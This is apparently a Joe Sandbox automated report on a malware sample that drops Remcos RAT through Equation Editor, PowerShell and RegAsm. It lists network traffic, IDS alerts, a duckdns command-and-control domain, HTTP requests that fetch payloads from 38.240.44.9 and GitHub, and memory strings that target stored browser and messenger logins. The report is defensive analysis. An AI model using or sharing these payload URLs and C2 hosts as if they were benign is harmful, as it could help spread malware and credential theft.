                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 192.3.101.184:9674
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 192.3.101.184:9674
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 38.240.44.9:80 -> 192.168.2.22:49176
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 38.240.44.9:80 -> 192.168.2.22:49176
                    Source: Malware configuration extractorURLs: ugnrv.duckdns.org
                    Source: unknownDNS query: name: ugnrv.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /450/RDSSSER.txt HTTP/1.1Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
                    Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                    Source: Joe Sandbox ViewASN Name: TTSLMEIS-AS-APTTSL-ISPDIVISIONIN TTSLMEIS-AS-APTTSL-ISPDIVISIONIN
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49179 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /d1a1 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: m2g.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /450/newsweetnesswithverynicecute.Tif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49167 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49169 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49174 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49173 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49175 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 38.240.44.9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,19_2_0041B411
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D22162DF.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /d1a1 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: m2g.meConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /450/hun/nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____veryniceenitertime.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /450/newsweetnesswithverynicecute.Tif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /450/RDSSSER.txt HTTP/1.1Host: 38.240.44.9Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: bhvE936.tmp.20.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.493002078.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhvE936.tmp.20.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: m2g.me
                    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: ugnrv.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000010.00000002.486492104.00000000026B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9
                    Source: powershell.exe, 00000010.00000002.486492104.00000000026B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/450/RDSSSER.txt
                    Source: EQNEDT32.EXE, 0000000B.00000002.462980650.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/450/newsweetnesswithverynicecute.Tif
                    Source: EQNEDT32.EXE, 0000000B.00000002.462980650.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.44.9/450/newsweetnesswithverynicecute.Tifj
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                    Source: RegAsm.exe, RegAsm.exe, 00000013.00000002.642709056.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: RegAsm.exe, 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpa
                    Source: RegAsm.exe, 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
                    Source: powershell.exe, 00000010.00000002.486492104.000000000292E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: powershell.exe, 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhvE936.tmp.20.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: powershell.exe, 00000010.00000002.489646290.0000000004EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
